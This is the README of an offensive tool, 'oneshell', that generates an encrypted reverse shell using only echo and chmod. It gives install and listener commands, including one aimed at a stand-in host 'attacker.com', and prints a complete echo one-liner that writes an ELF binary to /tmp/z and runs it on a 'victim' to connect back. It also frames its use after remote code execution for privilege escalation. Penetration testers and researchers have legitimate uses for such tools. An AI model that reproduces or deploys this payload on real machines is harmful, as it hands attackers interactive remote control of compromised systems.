Docker
Replace oneshell commands with the following:
docker run --rm -it -p 9001:9001 tantosec/oneshellRemember to update the value of the
-poption to the port you are using.
Local install
go install github.com/tantosec/oneshell@latestPrebuilt binary
Download a binary from the releases page.
If you want your payload to connect back to localhost on port 9001, run the following command:
oneshell -t localhost -p 9001In the real world, you will probably have an internet accessible server (for example attacker.com) with a firewall that allows port 9001 through. As you want the victim to connect back to attacker.com, you will run a command like this on the attacker.com machine:
oneshell -t attacker.com -p 9001You should receive output similar to the following:
Generating temporary MTLS certificates...
Payload connects to 127.0.0.1:9001
Copy the following command and run on victim:
zy(){ if [ `echo -e` ];then echo "$1";else echo -e "$1";fi;};zy '\0177ELF\02\01\01\0\0\0\0\0\0\0\0\0\02\0>\0\01\0\0\0x\0200\02\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\070\0\01\0@\0\0\0\0\0\01\0\0\0\07\0\0\0\0\0\0\0\0\0\0\0\0\0200\02\0\0\0\0\0\0\0200\02\0\0\0\0\0l\01\0\0\0\0\0\0\0354i\013\0\0\0\0\0\0\0 \0\0\0\0\0\061\0300\0260)\0277\02\0\0\0\0276\01\0\0\0\061\0322\017\05I\0211\0307\0211\0307\0276d\0201\02\0\061\0322\0262\020\061\0300\0260*\017\05\0272\0210h\013\0\061\0300\017\05)\0302\01\0306\0203\0372\0w\0363\0277\021m\01\0H\0272d\0201\02\0\0\0\0\0H\0203\0377\0\017\0216\0205\0\0\0H\0213\02H\0213\034%>\0201\02\0H1\0330H\0211\04%>\0201\02\0H1\0300H1\0311\0276\0\0\0\0\0212\04%>\0201\02\0H\0201\0376\0\01\0\0s3@\0210\0361H\0203\0341\07\02\0201\066\0201\02\0H%\0377\0\0\0\0212\0200\0\0200\02\0H\0377\0301H\0203\0341\07\02\0201>\0201\02\0\0320\0300\0210\0201>\0201\02\0H\0377\0306\0353\0304H\0203\0302\010H\0377\0317\0353\0211k.Yc3\0255`OMw\0236K\0210\0256E\0323#\02\0271\0247l\0277\0372uH\0213\04%>\0201\02\0H\0213\034%F\0201\02\0H9\0330t\01\0314\02\0#)\0177\0\0\01'>/tmp/z;chmod +x /tmp/z;/tmp/z
2024/07/15 15:51:17 Listening for connections on 0.0.0.0:9001
Copy the part that says
zy(){ if [ `echo -e` ];then echo "$1";else echo -e "$1";fi;};zy '\0177ELF\02\01\01\0\0\0\0\0\0\0\0\0\02\0>\0\01\0\0\0x\0200\02\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\070\0\01\0@\0\0\0\0\0\01\0\0\0\07\0\0\0\0\0\0\0\0\0\0\0\0\0200\02\0\0\0\0\0\0\0200\02\0\0\0\0\0l\01\0\0\0\0\0\0\0354i\013\0\0\0\0\0\0\0 \0\0\0\0\0\061\0300\0260)\0277\02\0\0\0\0276\01\0\0\0\061\0322\017\05I\0211\0307\0211\0307\0276d\0201\02\0\061\0322\0262\020\061\0300\0260*\017\05\0272\0210h\013\0\061\0300\017\05)\0302\01\0306\0203\0372\0w\0363\0277\021m\01\0H\0272d\0201\02\0\0\0\0\0H\0203\0377\0\017\0216\0205\0\0\0H\0213\02H\0213\034%>\0201\02\0H1\0330H\0211\04%>\0201\02\0H1\0300H1\0311\0276\0\0\0\0\0212\04%>\0201\02\0H\0201\0376\0\01\0\0s3@\0210\0361H\0203\0341\07\02\0201\066\0201\02\0H%\0377\0\0\0\0212\0200\0\0200\02\0H\0377\0301H\0203\0341\07\02\0201>\0201\02\0\0320\0300\0210\0201>\0201\02\0H\0377\0306\0353\0304H\0203\0302\010H\0377\0317\0353\0211k.Yc3\0255`OMw\0236K\0210\0256E\0323#\02\0271\0247l\0277\0372uH\0213\04%>\0201\02\0H\0213\034%F\0201\02\0H9\0330t\01\0314\02\0#)\0177\0\0\01'>/tmp/z;chmod +x /tmp/z;/tmp/z
and run it on the victim. You should receive an interactive shell connection on the server, which will be secured with mutual TLS.
Let's say that you have achieved remote code execution on a target machine and are looking to escalate your privileges. You might think to establish a reverse shell to make this process easier. However, being a security professional, you want your connection to be encrypted to prevent data being transferred insecurely.
It turns out that there are a few ways to do this, mostly involving the openssl or ncat tools. What if you don't have these tools on the target? One solution is to download them over the internet using curl or wget. But what if the target doesn't have these binaries either? The base ubuntu Docker image doesn't.
"One Shell To Rule Them All", or oneshell for short, is a tool that can solve this problem. It does this by running an encrypted reverse shell using only the echo and chmod commands.
To find out how it works, check out my blog on the topic here.
- Target can connect to your listener via TCP
- Shell execution on the target (for example
systemin PHP)- This will allow using the
echoinbuilt shell command
- This will allow using the
- x86_64 CPU (Arm64 support coming soon)
chmodbinary located on path- The ability to write to the following file paths:
/tmp/x,/tmp/y,/tmp/z
These conditions cover almost all server setups.
- Basis for Tiny ELF file from https://nathanotterness.com/2021/10/tiny_elf_modernized.html
- AES implementation sourced from https://github.com/mko-x/SharedAES-GCM/tree/master/Sources